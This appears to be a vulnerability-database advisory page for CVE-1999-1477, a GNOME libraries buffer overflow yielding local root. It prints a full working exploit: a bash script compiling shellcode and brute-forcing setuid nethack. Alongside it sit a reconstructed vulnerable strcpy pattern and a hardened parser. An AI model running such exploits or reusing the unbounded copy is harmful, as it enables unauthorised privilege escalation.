CVE-1999-1477
CVSS 7.2
Published: 1999-09-23 00:00:00
Last revised: 2008-09-05 16:19:37

[Original] Buffer overflow in GNOME libraries 1.0.8 allows local user to gain root access via a long --espeaker argument in programs such as nethack.


[CNNVD] GNOME espeaker local buffer overflow vulnerability (CNNVD-199909-043)

        A buffer overflow exists in GNOME libraries 1.0.8. A local user can gain root privileges via a long --espeaker argument to a program such as nethack.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:gnome:gnome_libs:1.0.8
cpe:/o:mandrakesoft:mandrake_linux:6.0 (MandrakeSoft Mandrake Linux 6.0)

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1477
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1477
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-043
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/3349.php
(VENDOR_ADVISORY)  XF  gnome-espeaker-local-bo(3349)
http://www.securityfocus.com/bid/663
(VENDOR_ADVISORY)  BID  663
http://www.securityfocus.com/archive/1/28717
(VENDOR_ADVISORY)  BUGTRAQ  19990923 Linux GNOME exploit

- Vulnerability information

GNOME espeaker local buffer overflow vulnerability
High severity  Buffer overflow
Published: 1999-09-23 00:00:00  Updated: 2005-10-20 00:00:00
Local
        A buffer overflow exists in GNOME libraries 1.0.8. A local user can gain root privileges via a long --espeaker argument to a program such as nethack.

- Advisories and patches

        MandrakeSoft has made available a fix for the 'nethack' program. This does not fix the GNOME vulnerability, but it stops it from being exploited via the 'nethack' executable. The updated gnomehack RPM is available at
        http://www.linux-mandrake.com/en/fupdates.php

- Vulnerability information (19512)

Mandriva Linux Mandrake 6.0, Gnome Libs 1.0.8 espeaker Local Buffer Overflow (EDBID:19512)
Platform: linux  Type: local
Date: 1999-09-26  Verified
Author: Brock Tellier
source: http://www.securityfocus.com/bid/663/info

A buffer overflow vulnerability in GNOME's shared libraries' handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access.

Calling a program linked against GNOME with the command line arguments '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow.

One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'.

It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable. 

#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our settings
# just so.  Hence the shell script.
#
# This should work against any su/gid GNOME program.  The only one that comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to exploit
# a different program.
#
# -Brock Tellier btellier@webley.com

echo "Building /tmp/gnox.c..."
# Quoted heredoc delimiter: nothing inside is subject to shell expansion.
cat > /tmp/gnox.c <<'EOF'
/*
 * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
 * Will work against any program using the GNOME libraries in the form
 * Keep your BUFLEN at 90 and only modify your offset
 *
 * Payload layout (90 bytes): NOP sled in [0,35), shellcode in [35,80),
 * then the guessed return address repeated through [80,88).
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Generic Linux x86 execve() shellcode, modified to run our program
 * (/tmp/gn in place of /bin/sh). It writes its own NUL terminator. */
char gnoshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/gn";

#define LEN 120
#define BUFLEN 90 /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300

/* Current stack pointer; the return address is guessed as esp - offset. */
unsigned long get_sp(void) {
  unsigned long sp;
  __asm__("movl %%esp, %0" : "=r"(sp));
  return sp;
}

int main(int argc, char *argv[]) {

int offset, i;
int buflen = BUFLEN;
unsigned long addr;
char buf[BUFLEN + 1];   /* +1 so the payload is NUL-terminated for sprintf */
char gnobuf[LEN];
if(argc > 2) {
  fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
  exit(1);
}
 else if (argc == 2){
   offset=atoi(argv[1]);
 }
 else {
   offset=DEFAULT_OFFSET;
 }


addr=get_sp();

fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
fprintf(stderr, "Using addr: 0x%lx  buflen:%d  offset:%d\n", addr-offset,
buflen, offset);

memset(buf,NOP,buflen);                        /* NOP sled */
memcpy(buf+35,gnoshell,strlen(gnoshell));      /* shellcode at offset 35 */
for(i=35+strlen(gnoshell);i<buflen-4;i+=4)    /* return address guesses */
        *(unsigned int *)&buf[i]=addr-offset;
buf[buflen] = '\0';

/* Printed on stdout; the caller word-splits this into two argv elements. */
sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
for(i=0;i<strlen(gnobuf);i++)
        putchar(gnobuf[i]);

return 0;
}
EOF

echo "...done!"

echo "Building /tmp/gn.c..."

cat > /tmp/gn.c <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Payload program: make the real uid/gid match the effective (setuid) ones
 * so the spawned shell keeps root, and report the ids before and after. */
int main(void) {
  printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());

  setreuid(geteuid(), geteuid());
  setregid(getegid(), getegid());

  printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());

  system("/bin/bash");
  return 0;
}
EOF

echo "...done!"

echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"

echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"

echo "Launching attack..."

# Brute-force the return address: each run guesses esp - offset, stepping
# 4 bytes at a time. The unquoted command substitution is intentional: gnox
# prints "--enable-sound --espeaker=<payload>" and word splitting turns it
# into the two arguments the target expects.
offset=0

while [ "$offset" -lt 10000 ]; do
    /usr/games/nethack $(/tmp/gnox "$offset")
    offset=$((offset + 4))
done

echo "...done!"

- Vulnerability information

OSVDB 13530
GNOME Libraries Local Overflow
Local Access Required  Input Manipulation
Loss of Integrity  Solution Unknown
Exploit Public  Third-party Verified, Uncoordinated Disclosure

- Vulnerability description

- Timeline

1999-09-26 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Credit

Unknown or Incomplete

- Vulnerability information

GNOME espeaker Local Buffer Overflow Vulnerability
Boundary Condition Error 663
No No
1999-09-26 12:00:00 2009-07-11 12:56:00
This vulnerability was found by Brock Tellier <btellier@webley.com>.

- Affected versions

Mandriva Linux Mandrake 6.0
GNOME Gnome Libs 1.0.8
+ RedHat Linux 6.0

- Unaffected versions

GNOME Gnome Libs 1.0.15

- Discussion

A buffer overflow vulnerability in GNOME's shared libraries' handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access.

Calling a program linked against GNOME with the command line arguments '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow.

One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'.

It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable.
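As an added example (not code from the advisory, from the exploit author, or from the GNOME/esound sources), the following C reconstructs the pattern described in this discussion and in the EDB entry above: an argv element copied into a fixed 80-byte stack buffer, beside a bounded parser that rejects the 90-byte value the exploit script emits. The 80-byte buffer size comes from the advisory; the `host[:port]` shape of the --espeaker value, the default port 16001, and every function name here are assumptions of the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define ESPEAKER_BUF 80            /* buffer size named in the advisory */
#define ESPEAKER_DEFAULT_PORT 16001 /* assumed default when ":port" is absent */

/* Length of s, never scanning past max bytes (local stand-in for strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* VULNERABLE PATTERN (reconstructed, not the real library code): the
 * attacker-controlled argv element is copied into a fixed stack buffer with
 * no length check. In a setuid root binary a value longer than ESPEAKER_BUF
 * overwrites what follows `host` on the stack, including the saved return
 * address. Never call this with untrusted input; it only shows the shape. */
void espeaker_parse_unbounded(const char *arg, char *host_out)
{
    char host[ESPEAKER_BUF];
    strcpy(host, arg);              /* no bound: this is the overflow */
    strcpy(host_out, host);
}

/* HARDENED FORM: refuse (rather than silently truncate) anything that does
 * not fit, then parse "host[:port]" with explicit bounds and a validated
 * port. Returns 0 on success, -1 on rejection; on rejection the caller's
 * host buffer and port are left untouched. */
int espeaker_parse_bounded(const char *arg, char *host, size_t hostsz,
                           unsigned *port)
{
    if (arg == NULL || host == NULL || port == NULL || hostsz == 0)
        return -1;
    size_t n = bounded_len(arg, hostsz);
    if (n == 0 || n >= hostsz)      /* empty, or no room left for the NUL */
        return -1;

    const char *colon = memchr(arg, ':', n);
    size_t hostlen = colon ? (size_t)(colon - arg) : n;
    if (hostlen == 0)
        return -1;
    for (size_t i = 0; i < hostlen; i++) {  /* conservative hostname allow-list */
        char c = arg[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '-';
        if (!ok)
            return -1;
    }

    unsigned long p = ESPEAKER_DEFAULT_PORT;
    if (colon) {
        char *end;
        errno = 0;
        p = strtoul(colon + 1, &end, 10);
        if (errno != 0 || end == colon + 1 || *end != '\0' || p == 0 || p > 65535)
            return -1;
    }
    memcpy(host, arg, hostlen);
    host[hostlen] = '\0';
    *port = (unsigned)p;
    return 0;
}

/* Self-checks: a constructed 90-byte value (the exploit's BUFLEN) must be
 * rejected, a normal host:port must parse, bad ports must be refused.
 * Each returns 1 on the expected outcome. */
int check_overlong_rejected(void)
{
    char big[91];                  /* constructed 90-byte argument */
    memset(big, 'A', 90);
    big[90] = '\0';
    char host[ESPEAKER_BUF];
    unsigned port = 0;
    return espeaker_parse_bounded(big, host, sizeof host, &port) == -1;
}

int check_valid_parses(void)
{
    char host[ESPEAKER_BUF];
    unsigned port = 0;
    int rc = espeaker_parse_bounded("sound.example.org:16001", host, sizeof host, &port);
    return rc == 0 && strcmp(host, "sound.example.org") == 0 && port == 16001;
}

int check_bad_port_rejected(void)
{
    char host[ESPEAKER_BUF];
    unsigned port = 0;
    return espeaker_parse_bounded("localhost:99999", host, sizeof host, &port) == -1
        && espeaker_parse_bounded("localhost:", host, sizeof host, &port) == -1;
}

int main(void)
{
    printf("overlong rejected: %d\n", check_overlong_rejected());
    printf("valid parses:      %d\n", check_valid_parses());
    printf("bad port rejected: %d\n", check_bad_port_rejected());
    return 0;
}
```

The design point is the rejection rather than truncation: a parser that cuts a 90-byte value down to 79 bytes still accepts attacker-shaped input into a privileged process, whereas refusing it keeps the whole argument out of the stack frame. The same bound belongs in whichever library actually owns the buffer (the discussion above suspects libesd rather than libgnome), since fixing only the nethack wrapper, as the Mandrake update did, leaves every other set-id program linked against the library exposed.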

- Exploit

- Solution

MandrakeSoft has made available a fix for the 'nethack' program. This does not fix the GNOME vulnerability, but it stops it from being exploited via the 'nethack' executable. The updated gnomehack RPM is available at http://www.linux-mandrake.com/en/fupdates.php

- References
